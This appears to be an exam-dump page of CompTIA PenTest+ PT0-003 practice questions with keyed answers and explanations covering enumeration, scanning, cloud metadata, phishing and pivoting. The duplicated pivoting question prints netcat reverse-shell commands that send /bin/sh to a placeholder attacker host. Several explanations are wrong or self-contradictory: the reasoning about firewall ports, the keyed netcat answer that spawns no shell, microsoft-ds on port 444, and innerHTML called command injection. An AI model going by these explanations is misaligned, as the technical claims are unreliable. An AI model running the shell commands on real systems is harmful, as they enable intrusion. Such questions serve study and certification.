Practice Free PT0-003 Exam Online Questions
A penetration tester performs an assessment on the target company’s Kubernetes cluster using kube-hunter.
Which of the following types of vulnerabilities could be detected with the tool?
- A . Network configuration errors in Kubernetes services
- B . Weaknesses and misconfigurations in the Kubernetes cluster
- C . Application deployment issues in Kubernetes
- D . Security vulnerabilities specific to Docker containers
B
Explanation:
kube-hunter is a tool designed to perform security assessments on Kubernetes clusters. It identifies various vulnerabilities, focusing on weaknesses and misconfigurations.
Here’s why option B is correct:
Kube-hunter: It scans Kubernetes clusters to identify security issues, such as misconfigurations, insecure settings, and potential attack vectors.
Network Configuration Errors: While kube-hunter might identify some network-related issues, its primary focus is on Kubernetes-specific vulnerabilities and misconfigurations.
Application Deployment Issues: These are more related to the applications running within the cluster, not the cluster configuration itself.
Security Vulnerabilities in Docker Containers: Kube-hunter focuses on the Kubernetes environment rather than Docker container-specific vulnerabilities. Reference from Pentest:
Forge HTB: Highlights the use of specialized tools to identify misconfigurations in environments, similar to how kube-hunter operates within Kubernetes clusters.
Anubis HTB: Demonstrates the importance of identifying and fixing misconfigurations within complex
environments like Kubernetes clusters.
Conclusion:
Option B, weaknesses and misconfigurations in the Kubernetes cluster, accurately describes the type of vulnerabilities that kube-hunter is designed to detect.
A penetration tester reviews a SAST vulnerability scan report.
The following vulnerability has been reported as high severity:
Source file: components.ts
Issue 2 of 12: Command injection
Severity: High
Call: .innerHTML = response
The tester inspects the source file and finds the variable response is defined as a constant and is not referred to or used in other sections of the code.
Which of the following describes how the tester should classify this reported vulnerability?
- A . False negative
- B . False positive
- C . True positive
- D . Low severity
B
Explanation:
A false positive occurs when a vulnerability scan incorrectly flags a security issue that does not exist or is not exploitable in the context of the application.
Here’s the reasoning:
Definition of Command Injection: Command injection vulnerabilities occur when user-controllable data is passed to an interpreter or command execution context without proper sanitization, allowing an attacker to execute arbitrary commands.
Code Analysis:
The response variable is defined as a constant (const), which implies its value is immutable during runtime.
The response is not sourced from user input nor used elsewhere, meaning there is no attack surface or exploitation pathway for an attacker to influence the content of response.
Scanner Misclassification:Static Application Security Testing (SAST) tools may flag vulnerabilities based on patterns (e.g., .innerHTML usage) without assessing the source and flow of data, resulting in false positives.
Final Classification:Since the response variable is static and unchangeable, the flagged issue is not exploitable. This makes it a false positive.
CompTIA Pentest+
Reference: Domain 3.0 (Attacks and Exploits)
Domain 4.0 (Penetration Testing Tools)
OWASP Static Code Analysis Guide
A penetration tester executes multiple enumeration commands to find a path to escalate privileges.
Given the following command:
find / -user root -perm -4000 -exec ls -ldb {} ; 2>/dev/null
Which of the following is the penetration tester attempting to enumerate?
- A . Attack path mapping
- B . API keys
- C . Passwords
- D . Permission
D
Explanation:
The command find / -user root -perm -4000 -exec ls -ldb {} ; 2>/dev/null is used to find files with the SUID bit set. SUID (Set User ID) permissions allow a file to be executed with the permissions of the file owner (root), rather than the permissions of the user running the file.
Understanding the Command:
find /: Search the entire filesystem.
-user root: Limit the search to files owned by the root user.
-perm -4000: Look for files with the SUID bit set.
-exec ls -ldb {} ;: Execute ls -ldb on each found file to list it in detail.
2>/dev/null: Redirect error messages to /dev/null to avoid cluttering the output.
Purpose:
Enumerating SUID Files: The command is used to identify files with elevated privileges that might be exploited for privilege escalation.
Security Risks: SUID files can pose security risks if they are vulnerable, as they can be used to execute code with root privileges.
Why Enumerate Permissions:
Identifying SUID files is a crucial step in privilege escalation as it reveals potential attack vectors that can be exploited to gain root access.
Reference from Pentesting Literature:
Enumeration of SUID files is a common practice in penetration testing, as discussed in various guides and write-ups.
HTB write-ups often detail how finding and exploiting SUID binaries can lead to root access on a target system.
Step-by-Step ExplanationReference: Penetration Testing – A Hands-on Introduction to Hacking HTB Official Writeups
A penetration tester observes the following output from an Nmap command while attempting to troubleshoot connectivity to a Linux server:
Starting Nmap 7.91 ( https://nmap.org ) at 2024-01-10 12:00 UTC Nmap scan report for example.com (192.168.1.10) Host is up (0.001s latency).
Not shown: 9999 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
2222/tcp open ssh
444/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds
Which of the following is the most likely reason for the connectivity issue?
- A . The SSH service is running on a different port.
- B . The SSH service is blocked by a firewall.
- C . The SSH service requires certificate authentication.
- D . The SSH service is not active.
A
Explanation:
The key detail in the Nmap scan output is that port 2222/tcp is open and running the SSH service. The standard SSH port is 22, so if the tester was attempting to connect on port 22, they would not succeed because SSH is instead listening on port 2222.
This is a common security hardening tactic―moving services to non-standard ports to reduce automated attacks.
There is no indication that the service is blocked (B), or requires certificates (C), or is inactive (D), because Nmap clearly shows the service is open and identified. CompTIA PenTest+
Reference: PT0-003 Objective 3.3: Analyze tool output or data related to engagement activities.
Nmap usage and interpreting scan results is emphasized in multiple sections.
During an external penetration test, a tester receives the following output from a tool:
test.comptia.org
info.comptia.org
vpn.comptia.org
exam.comptia.org
Which of the following commands did the tester most likely run to get these results?
- A . nslookup -type=SOA comptia.org
- B . amass enum -passive -d comptia.org
- C . nmap -Pn -sV -vv -A comptia.org
- D . shodan host comptia.org
B
Explanation:
The tool and command provided by option B are used to perform passive DNS enumeration, which can uncover subdomains associated with a domain.
Here’s why option B is correct:
amass enum -passive -d comptia.org: This command uses the Amass tool to perform passive DNS enumeration, effectively identifying subdomains of the target domain. The output provided (subdomains) matches what this tool and command would produce.
nslookup -type=SOA comptia.org: This command retrieves the Start of Authority (SOA) record, which does not list subdomains.
nmap -Pn -sV -vv -A comptia.org: This Nmap command performs service detection and aggressive scanning but does not enumerate subdomains.
shodan host comptia.org: Shodan is an internet search engine for connected devices, but it does not perform DNS enumeration to list subdomains.
Reference from Pentest:
Writeup HTB: Demonstrates the use of DNS enumeration tools like Amass to uncover subdomains during external assessments.
Horizontall HTB: Highlights the effectiveness of passive DNS enumeration in identifying subdomains and associated information.
In a cloud environment, a security team discovers that an attacker accessed confidential information that was used to configure virtual machines during their initialization.
Through which of the following features could this information have been accessed?
- A . IAM
- B . Block storage
- C . Virtual private cloud
- D . Metadata services
D
Explanation:
In a cloud environment, the information used to configure virtual machines during their initialization could have been accessed through metadata services.
Metadata Services:
Definition: Cloud service providers offer metadata services that provide information about the running instance, such as instance ID, hostname, network configurations, and user data.
Access: These services are accessible from within the virtual machine and often include sensitive information used during the initialization and configuration of the VM.
Other Features:
IAM (Identity and Access Management): Manages permissions and access to resources but does not directly expose initialization data.
Block Storage: Provides persistent storage but does not directly expose initialization data.
Virtual Private Cloud (VPC): Provides network isolation for cloud resources but does not directly
expose initialization data.
Pentest
Reference: Cloud Security: Understanding how metadata services work and the potential risks associated with them is crucial for securing cloud environments.
Exploitation: Metadata services can be exploited to retrieve sensitive data if not properly secured. By accessing metadata services, an attacker can retrieve sensitive configuration information used during VM initialization, which can lead to further exploitation.
A penetration tester finds an unauthenticated RCE vulnerability on a web server and wants to use it to enumerate other servers on the local network. The web server is behind a firewall that allows only an incoming connection to TCP ports 443 and 53 and unrestricted outbound TCP connections. The target web server is https://target.comptia.org.
Which of the following should the tester use to perform the task with the fewest web requests?
- A . nc -e /bin/sh -lp 53
- B . /bin/sh -c ‘nc -l -p 443’
- C . nc -e /bin/sh <pentester_ip> 53
- D . /bin/sh -c ‘nc <pentester_ip> 443’
D
Explanation:
The tester needs to pivot from the compromised web server while bypassing firewall restrictions that allow:
Inbound traffic only on TCP 443 (HTTPS) and TCP 53 (DNS)
Unrestricted outbound traffic
Reverse shell using TCP 443 (Option D):
This command initiates an outbound connection to the pentester’s machine on port 443, which is
allowed by the firewall.
Example:
/bin/sh -c ‘nc <pentester_ip> 443 -e /bin/sh’
The pentester listens on TCP 443 and receives the shell from the target.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "Pivoting and Network Tunneling Techniques"
Incorrect options:
Option A (nc -e /bin/sh -lp 53): This listens on TCP 53, but does not establish an outbound connection.
Option B (nc -l -p 443): Listens locally but does not connect back to the attacker.
Option C (nc -e /bin/sh <pentester_ip> 53): TCP 53 is inbound only, meaning this connection will be blocked.
A penetration tester finds an unauthenticated RCE vulnerability on a web server and wants to use it to enumerate other servers on the local network. The web server is behind a firewall that allows only an incoming connection to TCP ports 443 and 53 and unrestricted outbound TCP connections. The target web server is https://target.comptia.org.
Which of the following should the tester use to perform the task with the fewest web requests?
- A . nc -e /bin/sh -lp 53
- B . /bin/sh -c ‘nc -l -p 443’
- C . nc -e /bin/sh <pentester_ip> 53
- D . /bin/sh -c ‘nc <pentester_ip> 443’
D
Explanation:
The tester needs to pivot from the compromised web server while bypassing firewall restrictions that allow:
Inbound traffic only on TCP 443 (HTTPS) and TCP 53 (DNS)
Unrestricted outbound traffic
Reverse shell using TCP 443 (Option D):
This command initiates an outbound connection to the pentester’s machine on port 443, which is
allowed by the firewall.
Example:
/bin/sh -c ‘nc <pentester_ip> 443 -e /bin/sh’
The pentester listens on TCP 443 and receives the shell from the target.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "Pivoting and Network Tunneling Techniques"
Incorrect options:
Option A (nc -e /bin/sh -lp 53): This listens on TCP 53, but does not establish an outbound connection.
Option B (nc -l -p 443): Listens locally but does not connect back to the attacker.
Option C (nc -e /bin/sh <pentester_ip> 53): TCP 53 is inbound only, meaning this connection will be blocked.
A penetration tester launches an attack against company employees. The tester clones the company’s intranet login page and sends the link via email to all employees.
Which of the following best describes the objective and tool selected by the tester to perform this activity?
- A . Gaining remote access using BeEF
- B . Obtaining the list of email addresses using theHarvester
- C . Harvesting credentials using SET
- D . Launching a phishing campaign using GoPhish
C
Explanation:
The tester is conducting a phishing attack by cloning the company’s login page to steal employee credentials.
Option A (BeEF) ❌ : BeEF is used for browser exploitation, not phishing.
Option B (theHarvester) ❌ : Used for OSINT, gathering emails, but does not conduct phishing attacks.
Option C (SET – Social Engineering Toolkit) ✅ : Correct.
SET allows testers to clone web pages and perform phishing attacks.
Option D (GoPhish) ❌ : GoPhish is a phishing simulation tool, but SET is specifically designed for credential harvesting.
Reference: CompTIA PenTest+ PT0-003 Official Guide C Social Engineering & Phishing Attacks
A penetration tester is conducting reconnaissance on a target network. The tester runs the following Nmap command: nmap -sv -sT -p – 192.168.1.0/24.
Which of the following describes the most likely purpose of this scan?
- A . OS fingerprinting
- B . Attack path mapping
- C . Service discovery
- D . User enumeration
C
Explanation:
The Nmap command nmap -sv -sT -p- 192.168.1.0/24 is designed to discover services on a network.
Here is a breakdown of the command and its purpose:
Command Breakdown:
nmap: The network scanning tool.
-sV: Enables service version detection. This option tells Nmap to determine the version of the services running on open ports.
-sT: Performs a TCP connect scan. This is a more reliable method of scanning as it completes the TCP handshake but can be easily detected by firewalls and intrusion detection systems.
-p-: Scans all 65535 ports. This ensures a comprehensive scan of all possible TCP ports.